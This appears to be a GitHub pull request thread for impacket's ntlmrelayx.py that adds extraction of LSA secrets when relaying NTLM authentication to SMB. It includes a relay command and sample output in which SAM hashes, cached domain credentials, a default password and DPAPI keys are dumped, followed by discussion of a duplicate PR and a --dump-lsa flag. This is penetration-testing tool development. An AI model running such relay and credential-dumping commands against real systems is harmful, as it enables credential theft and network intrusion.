feat: add support for LSA secrets extractions when performing relay to smb with ntlmrelayx.py

[hugo-syn]

Add support for LSA secrets extractions when performing relay to smb with ntlmrelayx.py:

$ python3 ./examples/ntlmrelayx.py -t smb://13.37.13.37 -smb2support       
[...]

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 127.0.0.1, attacking target smb://13.37.13.37
[*] Authenticating against smb://13.37.13.37 as DEV.LOCAL/ADMIN SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xaad3b435b51404eeaad3b435b51404ee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
[*] Done dumping SAM hashes for host: 13.37.13.37
[*] Dumping cached domain logon information (domain/username:hash)
DEV.LOCAL/user:$DCC2$10240#user#aad3b435b51404eeaad3b435b51404ee: (2025-01-14 12:47:42+00:00)
[*] Done dumping LSA Cached hashes for host: 13.37.13.37
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
DEV\COMPUTER01$:plain_password_hex:2200390021005d0070005a[...]
DEV\COMPUTER01$:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
[*] DefaultPassword 
local_user:synacktiv
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xaad3b435b51404eeaad3b435b51404eeaaaaaaaa
dpapi_userkey:0xaad3b435b51404eeaad3b435b51404eeaaaaaaaa
[*] NL$KM 
 0000   10 48 50 1F 4A 91 F6 6C  EC 3F FC BD FF CA 74 84   .HP.J..l.?....t.
[...]
NL$KM:aad3b435b51404eeaad3b435b51404ee[...]
[*] Done dumping LSA secrets for host: 13.37.13.37
[*] Stopping service RemoteRegistry

I can add a flag to toggle this feature on or off, but if someone is interested in dumping SAM hashes, they’d likely appreciate access to LSA secrets as well :)

[SAERXCIT]

Hi!
Also in #1253 with the last comment from the impacket team being "we concluded it would be nice to have this functionality available through a new parameter ( like --dump-lsa ) and not as default" but inactive since then.

[hugo-syn]

Oh thanks for showing me this PR @SAERXCIT, I don't know what to do, should I close this and bump the other PR ?

[SAERXCIT]

Well, if anything this shows that this feature is actually wanted. As an external observer I'd say that the original author opened the PR 3 years ago and didn't follow up on Fortra's request for modifications 1 year ago ; on the other end you seem to be available right now to process any modification request. At least I would take into account Fortra's requirement to "have this functionality available through a new parameter ( like --dump-lsa ) and not as default", and hope your PR gets merged then.

[hugo-syn]

Well I can add the --dump-lsa flag but I don't want to steal the original author's work moreover I think that the pr you linked has additional features. Tell me what's better